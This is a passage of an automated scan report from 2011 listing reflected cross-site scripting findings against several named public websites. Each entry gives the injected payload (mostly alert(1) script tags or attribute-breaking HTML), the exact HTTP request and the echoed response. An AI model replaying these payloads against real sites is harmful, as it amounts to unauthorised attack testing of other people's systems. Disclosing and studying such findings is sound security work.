2.71. http://www.wisc.edu/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wisc.edu
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68eb7"><a>84482eb936a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /server-status?68eb7"><a>84482eb936a=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wisc.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:59:49 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Content-Type: text/html; charset=UTF-8
Content-Length: 19679

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-
...[SNIP]...
<input type="text" name="q" id="searchInput" value="server-status?68eb7"><a>84482eb936a=1" />
...[SNIP]...

2.72. http://www.yourdictionary.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1fb3b"><script>alert(1)</script>3f0642751f8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /1fb3b"><script>alert(1)</script>3f0642751f8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yourdictionary.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:47:29 GMT
Server: Apache
Vary: Host,Accept-Encoding,User-Agent
X-Powered-By: PHP/5.3.3
Cache-Control: max-age=5184000
Expires: Wed, 01 Jun 2011 11:47:29 GMT
X-LTK-Server: yd-ec2-www
Content-Type: text/html
Content-Length: 8908

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<meta property="og:url" content="http://www.yourdictionary.com/1fb3b"><script>alert(1)</script>3f0642751f8" />
...[SNIP]...

2.73. http://www.zdnet.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /server-status

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f521a"><a>d2276860312 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /f521a"><a>d2276860312 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:52:27 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 01-Apr-2012 11:52:27 GMT; path=/; domain=.zdnet.com
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/f521a"><a>d2276860312" />
...[SNIP]...

2.74. http://www.acehardware.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.acehardware.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8da4"><script>alert(1)</script>eaff8ad27c6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.acehardware.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=c8da4"><script>alert(1)</script>eaff8ad27c6

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:00:19 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=QJskNXPTNQjzhTLnkJynvk8JXQwRvJ1s5kJr7z1yLwCZfW5T3SFz!-1731419728; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
Set-Cookie: browser_id=123844397554; expires=Tuesday, 30-Mar-2021 12:00:20 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 106912

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!--Preview TimeZone = 'null' --><!--Preview Tim
...[SNIP]...
<IFRAME SRC="http://fls.doubleclick.net/activityi;src=1715989;type=homep509;cat=homep153;u1=;u2=1;u3=;u4=;u5=http://www.google.com/search?hl=en&q=c8da4"><script>alert(1)</script>eaff8ad27c6;ord=1;num=23295703?" WIDTH=1 HEIGHT=1 FRAMEBORDER=0>
...[SNIP]...

2.75. http://www.iboats.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.iboats.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 351ad<script>alert(1)</script>1156cf6eab3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iboats.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=351ad<script>alert(1)</script>1156cf6eab3

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:51:58 GMT
Server: Apache
Vary: *
Content-Type: text/html
Content-Length: 6579

<html>
       <head>
               <!--an unknown OS
   
               <title>Error - Internal Server Error</title>
           
<link href="/newboats/css/classifieds_home.css" rel="stylesheet" type="text/css" />            
               

               <link hr
...[SNIP]...
</script>1156cf6eab3">http://www.google.com/search?hl=en&q=351ad<script>alert(1)</script>1156cf6eab3</a>
...[SNIP]...

2.76. http://www.iboats.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.iboats.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d1b7"><script>alert(1)</script>8b8c2a2c524 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.iboats.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=8d1b7"><script>alert(1)</script>8b8c2a2c524

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 11:51:58 GMT
Server: Apache
Vary: *
Content-Type: text/html
Content-Length: 6583

<html>
       <head>
               <!--an unknown OS
   
               <title>Error - Internal Server Error</title>
           
<link href="/newboats/css/classifieds_home.css" rel="stylesheet" type="text/css" />            
               

               <link hr
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=8d1b7"><script>alert(1)</script>8b8c2a2c524">
...[SNIP]...

2.77. http://www.popcap.com/server-status [User-Agent HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.popcap.com
Path:   /server-status

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9ea48"-alert(1)-"7097f65fc20 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.39ea48"-alert(1)-"7097f65fc20
Host: www.popcap.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/html
Cache-Control: no-store, no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Set-Cookie: user_id=b474b090-d4dc-48c4-b7f2-b4885722e1c4; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: nickname=deleted; expires=Fri, 02-Apr-2010 11:35:23 GMT; path=/; domain=.popcap.com
Set-Cookie: lcid=1033; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: geo_location=US; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=000000000000000; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: demographics=000000000000000; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: cookie_version=5; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: PHPSESSID=bauj4rlni3rik9pmkvk5e4uhu5; path=/
Pragma: no-cache
Set-Cookie: lv=1301744124; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=001000000000000; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Set-Cookie: user_profile=001000000000000; expires=Tue, 27-Mar-2012 11:35:24 GMT; path=/; domain=.popcap.com
Cache-Control: post-check=0, pre-check=0
X-Cacheable: NO: !beresp.cacheable
Content-Length: 7758
Date: Sat, 02 Apr 2011 11:35:24 GMT
X-Varnish: 169123957
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-IP: .73
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>PopCap Games -
...[SNIP]...
op2="1033"
   
   s.prop6="English > " + s.pageName
   
       s.eVar18="b474b090-d4dc-48c4-b7f2-b4885722e1c4"
       var alternateID = "172.17.4.73curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.39ea48"-alert(1)-"7097f65fc20"
   
       s.prop10=s.visitorID
   
       s.prop4="Error >
...[SNIP]...

2.78. http://www.shoebuy.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.shoebuy.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f095"-alert(1)-"fb200d763f9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.shoebuy.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=4f095"-alert(1)-"fb200d763f9

Response

HTTP/1.1 404 Not Found
Server: Apache
Content-Type: text/html;charset=ISO-8859-1
Expires: Sat, 02 Apr 2011 11:36:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 11:36:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: NSC_1-26STU9-qh10.101.208.14=ffffffff096d440145525d5f4f58455e445a4a423660;expires=Sat, 02-Apr-2011 11:51:15 GMT;path=/
Content-Length: 124103


<html>
<head>
   <title>Search Options</title>
   <meta name="keywords" content=''>
   <meta name="description" content=''>
   <script type="text/javascript" src="/jscript/facebook.js">
...[SNIP]...
<script type="text/javascript">
       var d = new Date();
       d.setDate(d.getDate() + 30);
       var dstr = d.toGMTString();
       document.cookie = "lcreferer=" + "http://www.google.com/search?hl=en&q=4f095"-alert(1)-"fb200d763f9" + "; path=/; expires=" + dstr;
   </script>
...[SNIP]...

2.79. http://www.sportsauthority.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sportsauthority.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e8c2"><script>alert(1)</script>d850478623 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sportsauthority.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: http://www.google.com/search?hl=en&q=9e8c2"><script>alert(1)</script>d850478623

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:01:06 GMT
Server: Apache/2.0.63 (Unix)
Cache-Control: no-cache="set-cookie"
Pragma: no-cache
P3P: CP="PHY ONL CAO CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo HISa TELo OTPo OUR DELa STP BUS UNI COM NAV INT DEM OTC",policyref="/w3c/p3p.xml"
Set-Cookie: JSESSIONID=SLFWNXQCL2JQzVGjwTFJ4FkdKTtBQ6fQKLvg7MZTvyB6PY1kjbhQ!884784150; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: browser_id=123844645974; expires=Tuesday, 30-Mar-2021 12:01:06 GMT; path=/
Set-Cookie: sr_token=null; expires=Thursday, 01-Jan-1970 01:00:00 GMT; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 116121


<!--Preview TimeZone = 'null' --><!--Preview TimeZone = 'America/New_York' --><!-- Checking storemanPD --><!-- Checking productPreviewAllowed -->



...[SNIP]...
<iframe SRC="http://fls.doubleclick.net/activityi;src=1718856;type=homep006;cat=homep126;u1=null;u2=1;u3=null;u4=null;u5=http://www.google.com/search?hl=en&q=9e8c2"><script>alert(1)</script>d850478623;ord=1;num=59718268?" width="0" height="0" frameborder="0">
...[SNIP]...

2.80. http://www.zdnet.com/server-status [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /server-status

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d861d"><a>dfba8ebd5bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /server-status HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zdnet.com
Accept: */*
Proxy-Connection: Keep-Alive
Referer: d861d"><a>dfba8ebd5bd

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 11:51:40 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Sun, 01-Apr-2012 11:51:40 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Content-Length: 99874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
//adlog.com.com/adlog/i/r=6455&amp;sg=1815&amp;o=10%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2000&amp;nd=10&amp;pid=&amp;cid=0&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e5:4D97098A3A6B2&amp;orh=d861d"><a>dfba8ebd5bd&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=d861d">
...[SNIP]...

2.81. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4506f"><script>alert(1)</script>653e01c4ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?4506f"><script>alert(1)</script>653e01c4ef5=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 11:57:17 GMT
Location: http://townhall.com/server-status?4506f"><script>alert(1)</script>653e01c4ef5=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 257

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?4506f"><script>alert(1)</script>653e01c4ef5=1">http://townhall.com/server-status?4506f"
...[SNIP]...

2.82. http://www.townhall.com/server-status [name of an arbitrarily supplied request parameter]  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.townhall.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 98322<script>alert(1)</script>4f731bc80bc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /server-status?98322<script>alert(1)</script>4f731bc80bc=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.townhall.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Cache-Control: no-cache
Content-Type: text/html
Date: Sat, 02 Apr 2011 11:57:17 GMT
Location: http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1
Pragma: no-cache
X-PoolName:
X-Cache-Info: not cacheable; response specified "Cache-Control: no-cache"
Content-Length: 253

<html><body>The requested resource was moved. It could be found here: <a href="http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1">http://townhall.com/server-status?98322<script>alert(1)</script>4f731bc80bc=1</a>
...[SNIP]...

Report generated by XSS.CX at Sat Apr 02 07:42:05 CDT 2011.